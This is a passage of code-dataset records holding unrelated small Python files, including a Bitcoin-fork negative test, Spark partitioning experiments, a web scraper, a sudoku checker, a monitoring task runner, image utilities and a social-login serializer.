ForwardCalculation(w, x, b)\n        # calculate gradient of w and b\n        dW, dB = BackPropagation(x, y, z)\n        # update w,b\n        w, b = UpdateWeights(w, b, 
dW, dB, eta)\n\n ShowResult(X, Y, w, b, 1)\n\n result = Inference(w,b,0.346)\n print(\"result=\", result)\n","sub_path":"040/043.py","file_name":"043.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"641456647","text":"#!/usr/bin/env python3\n# Copyleft (c) 2017 eric sun\n\nfrom test_framework.test_framework import BitcoinTestFramework\nfrom test_framework.util import (assert_equal, assert_raises_rpc_error)\nfrom test_framework.authproxy import JSONRPCException\nimport time\n\nclass WHC_TOKEN_MANAGE(BitcoinTestFramework):\n def set_test_params(self):\n self.num_nodes = 2\n self.tip = None\n self.setup_clean_chain = True\n\n def token_manage_test(self):\n # generate 200whc for node[0]\n address = self.nodes[0].getnewaddress(\"\")\n address_dst = self.nodes[1].getnewaddress(\"\")\n self.nodes[0].generatetoaddress(1, address)\n self.nodes[0].generatetoaddress(1, address_dst)\n time.sleep(5)\n self.nodes[0].generatetoaddress(100, address)\n time.sleep(5)\n trans_id = self.nodes[0].whc_burnbchgetwhc(4)\n trans_id1 = self.nodes[1].whc_burnbchgetwhc(4)\n self.nodes[0].generatetoaddress(1, address)\n time.sleep(1)\n\n # exp1: Ecosystem is invalid\n ret = self.nodes[0].whc_createrawtx_input(\"\", trans_id, 2)\n payload = self.nodes[0].whc_createpayload_issuancemanaged(1, 1, 0, \"\", \"\", \"l\", \"\", \"\")\n p = payload[:9] + '3' + payload[10:]\n ret = self.nodes[0].whc_createrawtx_opreturn(ret, p)\n ret = self.nodes[0].whc_createrawtx_reference(ret, address, 45.99)\n ret = self.nodes[0].signrawtransactionwithwallet(ret)\n trans_id = self.nodes[0].sendrawtransaction(ret[\"hex\"])\n self.nodes[0].generatetoaddress(10, address)\n time.sleep(1)\n trans = self.nodes[0].whc_gettransaction(trans_id)\n assert trans[\"valid\"] is False\n assert trans[\"invalidreason\"] == \"Ecosystem is invalid\"\n\n # exp2: property name is invalid\n ret = self.nodes[0].whc_createrawtx_input(\"\", trans_id, 1)\n payload = self.nodes[0].whc_createpayload_issuancemanaged(1, 1, 0, \"\", \"\", \"l\", \"\", \"\")\n p = payload[:26] + \"00\" + payload[28:]\n ret = self.nodes[0].whc_createrawtx_opreturn(ret, p)\n ret = self.nodes[0].whc_createrawtx_reference(ret, address, 45.98)\n ret = self.nodes[0].signrawtransactionwithwallet(ret)\n trans_id = self.nodes[0].sendrawtransaction(ret[\"hex\"])\n self.nodes[0].generatetoaddress(10, address)\n time.sleep(1)\n trans = self.nodes[0].whc_gettransaction(trans_id)\n assert trans[\"valid\"] is False\n assert trans[\"invalidreason\"] == \"Property name is empty\"\n\n def run_test(self):\n self.token_manage_test()\n\n\nif __name__ == '__main__':\n WHC_TOKEN_MANAGE().main()\n","sub_path":"test/functional/whc_issuemanagednegtive.py","file_name":"whc_issuemanagednegtive.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"169979159","text":"#!/usr/bin/env python3\n#\n# rdd_parition.py\n#\n# Experiment with paritions.\n\nfrom pyspark import SparkConf, SparkContext\n\nconf = SparkConf().setAppName(\"Count Appx\")\nsc = SparkContext(conf=conf)\nsc.setLogLevel(\"ERROR\")\n\nnums = range(0, 10)\nprint(nums)\n\n# The default is defined via sc.defaultParallelism. 
In a case of using parallelize()\n# without partitioner data is evenly distributed between partitions using their\n# indices (no partitioning scheme is used).\nrdd = sc.parallelize(nums)\nprint(\"Number of partitions: {}\".format(rdd.getNumPartitions()))\nprint(\"Partitioner: {}\".format(rdd.partitioner))\nprint(\"Partitions structure: {}\".format(rdd.glom().collect()))\n\n# Use parallelism of 2, the output would be:\n# Partitions structure: [[0, 1, 2, 3, 4], [5, 6, 7, 8, 9]]\nrdd = sc.parallelize(nums, 2)\nprint(\"Default parallelism: {}\".format(sc.defaultParallelism))\nprint(\"Number of partitions: {}\".format(rdd.getNumPartitions()))\nprint(\"Partitioner: {}\".format(rdd.partitioner))\nprint(\"Partitions structure: {}\".format(rdd.glom().collect()))\n\n# Use parallelism of 15, the output would be:\n# Partitions structure: [[], [0], [1], [], [2], [3], [], [4], [5], [], [6], [7], [], [8], [9]]\n#\n# This is bad because the time needed to prepare a new thread for processing\n# data (one element) is significantly greater than processing time itself.\nrdd = sc.parallelize(nums, 15)\nprint(\"Default parallelism: {}\".format(sc.defaultParallelism))\nprint(\"Number of partitions: {}\".format(rdd.getNumPartitions()))\nprint(\"Partitioner: {}\".format(rdd.partitioner))\nprint(\"Partitions structure: {}\".format(rdd.glom().collect()))\n\n# Use a custom partitioner to partition data based on country so analysis can\n# be performed country-wise. The output would be:\n# [\n# [('Poland', {'name': 'Marek', 'amount': 51, 'country': 'Poland'}),\n# ('Poland', {'name': 'Paul', 'amount': 75, 'country': 'Poland' })],\n# [('United Kingdom', {'name': 'Bob', 'amount': 100, 'country': 'United Kingdom'}),\n# ('United Kingdom', {'name': 'James', 'amount': 15, 'coutry': 'United Kingdom'}),\n# ('Germany', {'name': 'Johannes', 'amount': 200, 'country': 'Germany' })],\n# [],\n# []\n# ]\n#\n# Note the hash() function put 'United Kingdom' and 'Germany' into the same bucket.\ntransactions = [\n {'name': 'Bob', 'amount': 100, 'country': 'United Kingdom'},\n {'name': 'James', 'amount': 15, 'country': 'United Kingdom'},\n {'name': 'Marek', 'amount': 51, 'country': 'Poland'},\n {'name': 'Johannes', 'amount': 200, 'country': 'Germany'},\n {'name': 'Paul', 'amount': 75, 'country': 'Poland'},\n]\n\ndef country_partitioner(country):\n return hash(country)\n\nrdd = sc.parallelize(transactions) \\\n .map(lambda el: (el['country'], el)) \\\n .partitionBy(4, country_partitioner)\n\nprint(\"Number of partitions: {}\".format(rdd.getNumPartitions()))\nprint(\"Partitioner: {}\".format(rdd.partitioner))\nprint(\"Partitions structure: {}\".format(rdd.glom().collect()))\n\n# Use mapPartitions to map through each partition; the input to mapPartition\n# handler is an iterator which can be used to iterate elements of a partition.\ndef sum_sales(iterator):\n yield sum(transaction[1]['amount'] for transaction in iterator)\n\nby_country = sc.parallelize(transactions) \\\n .map(lambda el: (el['country'], el)) \\\n .partitionBy(3, country_partitioner)\n\nprint(\"Partitions structure: {}\".format(by_country.glom().collect()))\n\n# Sum sales in each partition\nsum_amounts = by_country \\\n .mapPartitions(sum_sales) \\\n .collect()\n\nprint(\"Total sales for each partition: {}\".format(sum_amounts))\n\n# Classical word count; each task will do the map on its own partition, and\n# reduce will result in data shuffle.\nlogFile = \"file:///home/deyuan/code/projects/overview.org\"\nlogData = sc.textFile(logFile)\n\ncounts = logData.flatMap(lambda line: 
line.split(\" \")) \\\n                .map(lambda word: (word, 1)).partitionBy(4)\n\n# Values of the same key will be passed to 'reduceByKey'. We'll see\n# four partition files in \"/tmp/hash\".\ncounts.reduceByKey(lambda x, y: x + y).saveAsTextFile(\"/tmp/hash\")\n\nsc.stop()\n","sub_path":"ml-core/spark/experiments/python/rdd_partition.py","file_name":"rdd_partition.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}{"seq_id":"631884489","text":"import time\nfrom selenium import webdriver\n\ndriver = webdriver.Chrome('/Users/Rosemary/Downloads/chromedriver')\ndriver.get('http://npb.jp/bis/2018/stats/idb2_g.html')\ntime.sleep(5)  # Let the user actually see something!\n\ntbody = driver.find_element_by_xpath('//*[@id=\"stdivmaintbl\"]/table/tbody')\n# print(\"tbody: \", tbody)\n\nfor tr in tbody.find_elements_by_class_name('ststats'):\n    for td in tr.find_elements_by_tag_name('td'):\n        print(td.text)\n\ndriver.quit()\n\n","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}{"seq_id":"584617010","text":"\n\nclass Solution:\n    # @param s, a string\n    # @return a list of strings\n    def restoreIpAddresses(self, s):\n        if len(s) > 12:\n            return []\n        return self.restore(s, str())\n\n    def restore(self, remainder, ip):\n        res = []\n        length = len(remainder)\n\n        if length == 0 and len(ip.split(\".\")) == 5:\n            return [ip[1:]]\n\n        if length >= 1:\n            res.extend(self.restore(remainder[1:], ip + \".\" + remainder[0:1]))\n\n        if length >= 2:\n            segment = remainder[0:2]\n            if 9 < int(segment) < 100:\n                res.extend(self.restore(remainder[2:], ip + \".\" + segment))\n\n        if length >= 3:\n            segment = remainder[0:3]\n            if 99 < int(segment) < 256:\n                res.extend(self.restore(remainder[3:], ip + \".\" + segment))\n\n        return res\n\n\nip = \"19216812\"\nprint(Solution().restoreIpAddresses(ip))","sub_path":"Python/Restore IP Addresses.py","file_name":"Restore IP Addresses.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}{"seq_id":"382151941","text":"# Copyright 2014 the original author or authors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom pubbot.dispatch import Signal\n\n# User got a tweet appearing in their timeline\ntweet = Signal(providing_args=['screen_name', 'text'])\n\n# User deauthorises stream\naccess_revoked = Signal()\n\n# User is blocked, or user blocks someone\nblock = Signal()\n\n# User is unblocked, or user unblocks someone\nunblock = Signal()\n\n# User favorites something, or a user's tweet is favorited\nfavorite = Signal()\n\n# User unfavorites something, or a user's tweet is unfavorited\nunfavorite = Signal()\n\n# User follows someone, or is followed\nfollow = Signal()\n\n# User unfollows someone\nunfollow = Signal()\n\nlist_created = Signal()\n\nlist_destroyed = Signal()\n\nlist_updated = Signal()\n\nlist_member_added = 
Signal()\n\nlist_member_removed = Signal()\n\nlist_user_subscribed = Signal()\n\nlist_user_unsubscribed = Signal()\n\nuser_update = Signal()\n","sub_path":"pubbot/twitter/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}{"seq_id":"203934018","text":"# QUASR Rocket GUI\n\n# Eric Donders\n# January 19, 2016\n\n# Meter class\n# displays a meter that can fill or empty\n\nfrom config import *\n\nclass Meter():\n\n    def __init__(self, parent, maximum, minimum):\n        self.parent = parent\n        self.maximum = maximum\n        self.minimum = minimum\n        self.value = 0\n        self.canvas = Canvas(parent, background='white')\n        self.color = 'white'\n\n    def place(self, x, y, width, height):\n        # fit to current window size\n        self.canvas.place(x=x, y=y, width=width, height=height)\n        self.x = x  # x position\n        self.y = y  # y position\n        self.width = width  # width of widget\n        self.height = height  # height of widget\n        # draw plot\n        self.draw()\n\n    def draw(self):\n        # draw the filled portion of the meter\n        self.canvas.create_rectangle(0,0,self.width*self.value/self.maximum,self.height, fill=self.color, width=0)\n\n    def send(self, value):\n        if value <= self.maximum:\n            if value > self.minimum:\n                self.value = value\n            else:\n                self.value = self.minimum\n        else:\n            self.value = self.maximum\n        if self.value >= self.maximum*0.6:\n            self.color = 'green'\n        elif self.value >= self.maximum*0.4:\n            self.color = 'yellow'\n        elif self.value >= self.maximum*0.2:\n            self.color = 'orange'\n        else:\n            self.color = 'red'\n        self.draw()\n\n    def reset(self):\n        self.value = 0\n        self.draw()\n\n    def destroy(self):\n        self.canvas.destroy()\n","sub_path":"meter.py","file_name":"meter.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}{"seq_id":"89638547","text":"# -*- coding: cp936 -*-\n# import modules\nfrom socket import *\n\n# define the host\nHost = \"192.168.25.76\"\n# define the port number\nPort = 21567\n# define the receive buffer size\nBufSize = 1024\n\nAddr = (Host, Port)\ntry:\n    udpClient = socket(AF_INET, SOCK_DGRAM)\n\n    # send and receive data in a loop\n    while True:\n        data = input(\">\")\n        if not data:\n            break\n        udpClient.sendto(bytes(data, \"utf-8\"), Addr)\n        r_data, Addr = udpClient.recvfrom(BufSize)\n        if not r_data:\n            break\n        print(\"return:\", r_data)\nexcept EOFError as error:\n    print(\"EOFError:\" + str(error))\nfinally:\n    if 'udpClient' in locals():\n        udpClient.close()\n","sub_path":"Chapter02/tsUcInt_py3.py","file_name":"tsUcInt_py3.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}{"seq_id":"499778118","text":"def ok_to_add(row, column, number):\n    number = str(number)\n\n    #Loop through every part of the board. 
x = row, y = column\n for x in range(len(bd)): \n for y in range(len(bd[x])):\n \n #If the column contains the same number, return false\n if(bd[row][y] == number):\n return False\n \n #If row contains same number,return false\n elif(bd[x][column] == number):\n return False\n \n #Check each 3 by 3 grid\n \n #Checks top third of board\n if(row in [0, 1, 2] and x in [0, 1, 2]):\n \n #Checks top left 3x3\n if(column in [0, 1, 2] and y in [0, 1, 2]):\n if(number == bd[x][y]):\n return False \n \n #Checks top middle 3x3\n elif(column in [3, 4, 5] and y in [3, 4, 5]):\n if(number == bd[x][y]):\n return False\n \n #Checks top right 3x3\n elif(column in [6, 7, 8] and y in [6, 7, 8]):\n if(number == bd[x][y]):\n return False\n \n #Checks center third of board\n elif(row in [3, 4, 5] and x in [3, 4, 5]):\n \n #Checks center left 3x3\n if(column in [0, 1, 2] and y in [0, 1, 2]):\n if(number == bd[x][y]):\n return False\n \n #Checks center middle 3x3\n elif(column in [3, 4, 5] and y in [3, 4, 5]):\n if(number == bd[x][y]):\n return False\n \n #Checks center right 3x3\n elif(column in [6, 7, 8] and y in [6, 7, 8]):\n if(number == bd[x][y]):\n return False\n \n #Checks bottom third\n elif(row in [6, 7, 8] and x in [6, 7, 8]):\n \n #Checks bottom left 3x3\n if(column in [0, 1, 2] and y in [0, 1, 2]):\n if(number == bd[x][y]):\n return False\n \n #Checks bottom middle 3x3\n elif(column in [3, 4, 5] and y in [3, 4, 5]):\n if(number == bd[x][y]):\n return False\n \n #Checks bottom right 3x3\n elif(column in [6, 7, 8] and y in [6, 7, 8]):\n if(number == bd[x][y]):\n return False\n return True\n\n\nbd = [ [ '1', '.', '.', '.', '2', '.', '.', '3', '7'],\n [ '.', '6', '.', '.', '.', '5', '1', '4', '.'],\n [ '.', '5', '.', '.', '.', '.', '.', '2', '9'],\n [ '.', '.', '.', '9', '.', '.', '4', '.', '.'],\n [ '.', '.', '4', '1', '.', '3', '7', '.', '.'],\n [ '.', '.', '1', '.', '.', '4', '.', '.', '.'],\n [ '4', '3', '.', '.', '.', '.', '.', '1', '.'],\n [ '.', '1', '7', '5', '.', '.', '.', '8', '.'],\n [ '2', '8', '.', '.', '4', '.', '.', '.', '6'] ]\n\n#Loop through the rows\nfor x in range(len(bd)): \n #If row is a border, print border before numbers\n if(x == 0 or x == 3 or x == 6):\n print('-' * 25) \n \n #Loop through the columns for this row \n for y in range(len(bd[x])): \n \n #If column is after a border, print border before number\n if( y == 0 or y == 3 or y == 6):\n print('|', end=' ')\n \n #Print number in that column\n print(bd[x][y], end=' ')\n \n #If column is before a border, print before after number\n if (y == 8):\n print('|')\n \n #If row is before the end, print border after the numbers\n if(x == 8):\n print('-' * 25)\n\nx1 = int(input('Enter a row from 0 to 8 ==> '))\ny1 = int(input('Enter a column from 0 to 8 => '))\nnumb = int(input('Enter the number from 1 to 9 => '))\n\nprint(ok_to_add(x1, y1, numb))\n","sub_path":"RPI-CSCI-1100 Computer Science I/lab/Lab6/check2.py","file_name":"check2.py","file_ext":"py","file_size_in_byte":4044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"633406603","text":"from models import Meal, Option, db_session\nfrom catalogue import catalogue\n\n\ndef update_db(catalogue):\n for meal in catalogue:\n meal_to_add = Meal(title=meal[\"title\"],\n description=meal[\"description\"])\n for choice in meal[\"choices\"]:\n option = Option(size=choice[\"title\"], price=choice[\"price\"])\n meal_to_add.options.append(option)\n db_session.add(meal_to_add)\n db_session.commit()\n\n\nif __name__ == '__main__':\n 
update_db(catalogue)\n","sub_path":"load_catalogue.py","file_name":"load_catalogue.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"64932179","text":"import logging\nlog = logging.getLogger(__name__)\n\n# Events, for Task\nimport event\n\n# Subprocess, for NagiosTask\nimport subprocess\nimport shlex\n\n# Multiprocessing, for PythonTask\nimport multiprocessing\n\n# Requests, for CloudKickTask\nimport requests\nrequests_log = logging.getLogger(\"requests\")\nrequests_log.setLevel(logging.WARNING)\n\nimport time\n\nclass Task():\n\tdef __init__(self, name, ttl):\n\t\tlog.info(\"Creating task: '%s' with TTL of %ss\" % (name, ttl))\n\t\tself.events = event.Events()\n\t\tself.name = name\n\t\tself.ttl = ttl\n\t\tself.tags = []\n\t\tself.timings = [0.75]\n\n\tdef add_tags(self, tags):\n\t\tif type(tags) == type(str()):\n\t\t\tself.tags.append(tags)\n\t\telif type(tags) == type(list()):\n\t\t\tself.tags.extend(tags)\n\n\tdef add_timing(self, value, keep=5):\n\t\tlog.debug(\"Task %s took %0.2fs\" % (self.name, value))\n\t\tself.timings.append(value)\n\t\tdel self.timings[:-keep]\n\n\tdef skew(self):\n\t\treturn sum(self.timings)/len(self.timings)\n\n\tdef start(self):\n\t\tlog.info(\"Starting task: '%s' (usually takes %0.2fs)\" % (self.name, self.skew()))\n\t\tself.start_time = time.time()\n\t\tself.run()\n\n\tdef get_events(self):\n\t\tself.join()\n\t\tself.end_time = time.time()\n\t\tself.add_timing(self.end_time - self.start_time)\n\n\t\treturn self.events\n\n\nclass PythonTask(Task):\n\tdef __init__(self, name, ttl, arg):\n\t\tTask.__init__(self, name, ttl)\n\t\tself.module = arg\n\n\tdef run(self):\n\t\t# TODO: Not yet built. Needs dynamic module/class loading\n\t\tpass\n\n\tdef join(self):\n\t\t#self.events.add(service=self.name, state=state, description=description, ttl=self.ttl, tags=self.tags)\n\t\tpass\n\n\nclass CloudKickTask(Task):\n\tdef __init__(self, name, ttl, arg):\n\t\tTask.__init__(self, name, ttl)\n\t\tself.url = arg\n\n\tdef request(self, url, q):\n\t\ttry:\n\t\t\tlog.debug(\"Starting web request to '%s'\" % (url))\n\t\t\tresp = requests.get(url)\n\t\t\tq.put(resp.json(), timeout=(self.ttl * 0.3))\n\t\texcept Exception as e:\n\t\t\tlog.error(\"Exception during request method of CloudKickTask '%s'\\n%s\" % (self.name, str(e)))\n\n\tdef run(self):\n\t\ttry:\n\t\t\tself.q = multiprocessing.Queue()\n\t\t\tself.proc = multiprocessing.Process(target=self.request, args=(self.url, self.q))\n\t\t\tself.proc.start()\n\t\texcept Exception as e:\n\t\t\tlog.error(\"Exception starting CloudKickTask '%s'\\n%s\" % (self.name, str(e)))\n\n\tdef join(self):\n\t\ttry:\n\t\t\tjson_result = self.q.get(timeout=(self.ttl * 0.3))\n\t\t\tself.proc.join()\n\n\t\t\tlog.debug('CloudKickTask: Processing %s metrics' % (len(json_result['metrics'])))\n\t\t\tfor metric in json_result['metrics']:\n\t\t\t\tself.events.add(\n\t\t\t\t\tservice=metric['name'],\n\t\t\t\t\tstate=metric['state'],\n\t\t\t\t\tmetric=metric['value'],\n\t\t\t\t\tdescription=\"Warn threshold: %s, Error threshold: %s\" % (metric['warn_threshold'], metric['error_threshold']),\n\t\t\t\t\tttl=self.ttl,\n\t\t\t\t\ttags=self.tags\n\t\t\t\t)\n\t\texcept Exception as e:\n\t\t\tlog.error(\"Exception joining CloudKickTask '%s'\\n%s\" % (self.name, str(e)))\n\n\nclass NagiosTask(Task):\n\texitcodes = {\n\t\t0: 'ok',\n\t\t1: 'warn',\n\t\t2: 'critical',\n\t\t3: 'unknown'\n\t}\n\n\tdef __init__(self, name, ttl, arg, shell=False):\n\t\tTask.__init__(self, 
name, ttl)\n\t\tself.raw_command = arg\n\t\tself.command = shlex.split(arg)\n\t\tself.use_shell = shell\n\n\tdef run(self):\n\t\ttry:\n\t\t\tself.process = subprocess.Popen(self.command, stdout=subprocess.PIPE, shell=self.use_shell)\n\t\texcept Exception as e:\n\t\t\tlog.error(\"Exception running task '%s':\\n%s\" % (self.name, str(e)))\n\n\tdef join(self):\n\t\ttry:\n\t\t\tstdout, stderr = self.process.communicate()\n\t\t\tdescription = self.raw_command + \"\\n\" + stdout\n\t\t\treturncode = self.process.returncode\n\n\t\t\tif returncode in self.exitcodes:\n\t\t\t\tstate = self.exitcodes[returncode]\n\t\t\telse:\n\t\t\t\tstate = 'unknown'\n\n\t\t\tself.events.add(service=self.name, state=state, description=description, ttl=self.ttl, tags=self.tags)\n\t\texcept Exception as e:\n\t\t\tlog.error(\"Exception joining task '%s':\\n%s\" % (self.name, str(e)))\n","sub_path":"lib/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}{"seq_id":"121003004","text":"# Class responsible for the screen display\n\nimport tkinter as tk\n\nclass View:\n\n    # The window title is decided when the instance is created.\n    def __init__(self, title):\n\n        self.title = title\n\n    def WindowView(self):\n\n        root = tk.Tk()\n\n        root.title(self.title)\n\n        root.geometry(\"800x600\")\n\n        img = tk.PhotoImage(file = \"sample.png\")\n\n        canvas = tk.Canvas(root, width = 640, height = 480)\n\n        canvas.create_rectangle(0, 0, 640, 480, fill='green')\n\n        canvas.place(x = 80, y = 60)\n\n        canvas.create_image(0, 0, anchor='nw', image = img)\n\n        root.mainloop()\n","sub_path":"view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}{"seq_id":"535801501","text":"#! 
/usr/bin/env python\n# coding: utf-8\n\nimport cv2\nimport numpy as np\n\nimport PIL\nimport PIL.Image\nimport PIL.ImageFont\nimport PIL.ImageDraw\n\n__all__ = (\"draw_textlines\", \"stitch_images\", \"get_label_color_map\")\n\n\ndef draw_textlines(image, origin, lines, color, size=26, thickness=2):\n    \"\"\"Draw lines of text on an image; supports Chinese characters.\"\"\"\n\n    img = PIL.Image.fromarray(image)\n    draw = PIL.ImageDraw.Draw(img)\n    font = PIL.ImageFont.truetype('simsun.ttc', size)\n    if isinstance(lines, str): lines = [lines]\n    for n, text in enumerate(lines):\n        offset_y = n * size + thickness\n        for i in range(0, thickness):\n            for j in range(0, thickness):\n                org = (origin[0] + i, origin[1] + j + offset_y)\n                draw.text(org, text, font=font, fill=color)\n    return np.array(img)\n\n\ndef stitch_images(images, width=512, height=384, fill=(0, 0, 0)):\n    \"\"\"Stitch up to 9 patches into a single image.\n\n    images: a list of at most 9 images in cv2 format.\n    width: the width each image occupies.\n    height: the height each image occupies.\n    \"\"\"\n\n    assert len(images) <= 9\n    rows = cols = 1\n    if len(images) <= 1:\n        rows, cols = 1, 1\n    elif len(images) <= 2:\n        rows, cols = 1, 2\n    elif len(images) <= 4:\n        rows, cols = 2, 2\n    elif len(images) <= 6:\n        rows, cols = 2, 3\n    elif len(images) <= 9:\n        rows, cols = 3, 3\n\n    stitched = np.zeros((height * rows, width * cols, 3), dtype=np.uint8)\n    stitched[:, :] = fill\n    for i, image in enumerate(images):\n        if image is None: continue\n\n        # resize while preserving the aspect ratio when needed\n        old_height, old_width = image.shape[:2]\n        if old_height > height or old_width > width:\n            new_height = height\n            new_width = new_height * old_width // old_height\n            if new_width > width:\n                new_width = width\n                new_height = new_width * old_height // old_width\n            image = cv2.resize(image, (new_width, new_height))\n\n        new_height, new_width = image.shape[:2]\n        start_x = (i % cols) * width + (width - new_width) // 2\n        start_y = (i // cols) * height + (height - new_height) // 2\n        end_x = start_x + new_width\n        end_y = start_y + new_height\n        stitched[start_y:end_y, start_x:end_x, :] = image\n    return stitched\n\n\ndef get_label_color_map(labels):\n    \"\"\"Generate a color for each label.\n\n    Method from: http://blog.csdn.net/yhl_leo/article/details/52185581\n    \"\"\"\n\n    assert len(labels) < 256, \\\n        \"this method can only generate 255 different colors.\"\n    colors = []\n    for i in range(len(labels)):\n        r, g, b, ii = (0, 0, 0, i)\n        for j in range(7):\n            str_ii = \"{:0>8}\".format(bin(ii)[2:])[-8:]\n            r = r ^ (int(str_ii[-1]) << (7 - j))\n            g = g ^ (int(str_ii[-2]) << (7 - j))\n            b = b ^ (int(str_ii[-3]) << (7 - j))\n            ii = ii >> 3\n        colors.append((r, g, b))\n    return dict(zip(labels, colors))\n\n\nif __name__ == \"__main__\":\n    pass\n","sub_path":"lib/util/imgutil.py","file_name":"imgutil.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}{"seq_id":"84779258","text":"from django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework import serializers\nfrom requests.exceptions import HTTPError\nfrom allauth.socialaccount.helpers import complete_social_login\n\n\nclass SocialLoginSerializer(serializers.Serializer):\n\n    access_token = serializers.CharField(required=True)\n\n    @method_decorator(csrf_exempt)\n    def validate_access_token(self, value):\n        access_token = value\n\n        view = self.context.get('view')\n        request = self.context.get('request')\n\n        if not view:\n            raise serializers.ValidationError('View is not defined, pass it ' +\n                                              'as a context variable')\n        self.adapter_class = getattr(view, 'adapter_class', None)\n\n        if 
not self.adapter_class:\n raise serializers.ValidationError('Define adapter_class in view')\n self.adapter = self.adapter_class()\n app = self.adapter.get_provider().get_app(request)\n token = self.adapter.parse_token({'access_token': access_token})\n token.app = app\n\n try:\n login = self.adapter.complete_login(request, app, token,\n response=access_token)\n token.account = login.account\n login.token = token\n complete_social_login(request, login)\n except HTTPError:\n raise serializers.ValidationError('Incorrect value')\n\n if not login.is_existing:\n login.lookup()\n if not login.account.user.username:\n login.account.user.username = \"_\".join([login.account.user.first_name, login.account.user.last_name])\n try:\n login.save(request, connect=True)\n except Exception as e:\n import ipdb ; ipdb.set_trace()\n self.object = {'user': login.account.user}\n\n return value\n","sub_path":"rest_auth/registration/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"486551043","text":"from operator import itemgetter\n\nfrom PyQt5.QtWidgets import (QWidget, QLCDNumber,\n QPushButton, QTextEdit,\n QComboBox)\nfrom src.interface.MainWindow import MainWindow\nfrom apscheduler.schedulers.background import BackgroundScheduler\n\nfrom src.ccd.core import SbigDriver, sbigLib\n\n\nclass InfoTemp(QWidget):\n scheduler2 = BackgroundScheduler()\n jobRefresh = None\n\n def __init__(self, parent = None):\n super(InfoTemp, self).__init__(parent)\n self.parent = parent\n self.lcd = QLCDNumber(self)\n self.lcd.setDigitCount(4)\n self.lcd.setGeometry(40, 50, 220, 40)\n\n self.stbutton = QPushButton(\"Fan\", self)\n self.stbutton.clicked.connect(self.btnFan)\n self.stbutton.resize(75, 25)\n self.stbutton.move(20, 100)\n\n self.fFan = QTextEdit(self)\n if SbigDriver.is_fanning():\n s = \"ON\"\n else:\n s = \"OFF\"\n\n self.fFan.setText(s)\n self.fFan.setReadOnly(True)\n self.fFan.resize(75, 25)\n self.fFan.move(75, 100)\n\n self.a = [['CFWP_1', 1], ['CFWP_2', 2], ['CFWP_3', 3], ['CFWP_4', 4], ['CFWP_5', 5]]\n\n self.combo = QComboBox(self)\n self.fill_filtercombo()\n self.combo.resize(75, 25)\n self.combo.move(200, 20)\n\n self.sfbutton = QPushButton(\"Set Filter\", self)\n self.sfbutton.clicked.connect(self.setFilter)\n self.sfbutton.resize(75, 25)\n self.sfbutton.move(280, 20)\n\n self.fFilter = QTextEdit(self)\n self.fFilter.setText(str(SbigDriver.get_filterposition()))\n self.fFilter.resize(75, 25)\n self.fFilter.move(350, 20)\n\n self.setbutton = QPushButton(\"Set Temp\", self)\n self.setbutton.clicked.connect(self.btnSetTemp)\n self.setbutton.resize(75, 25)\n self.setbutton.move(10, 20)\n\n self.tb = QTextEdit(self)\n self.tb.resize(75, 25)\n self.tb.move(100, 20)\n\n self.clockRefresh()\n self.startJob()\n\n def fill_filtercombo(self):\n if not MainWindow.isLocked(MainWindow):\n MainWindow.setAcquire(MainWindow)\n\n firmwarev, numberf = SbigDriver.get_filterinfo()\n\n mylist = []\n\n for nameAttr in dir(sbigLib.CFW_POSITION):\n attr = getattr(sbigLib.CFW_POSITION, nameAttr)\n if not callable(attr):\n if type(attr) == sbigLib.CFW_POSITION:\n mylist.append([nameAttr, attr.value])\n\n # sort list by column value\n mylist = sorted(mylist, key=itemgetter(1))\n\n for item in mylist:\n #exclude unknown item\n if item[1] > 0:\n self.combo.addItem(item[0], item[1])\n if self.combo.count() == numberf:\n break\n\n MainWindow.setRelease(MainWindow)\n\n\n\n # Functions for Watch\n # 
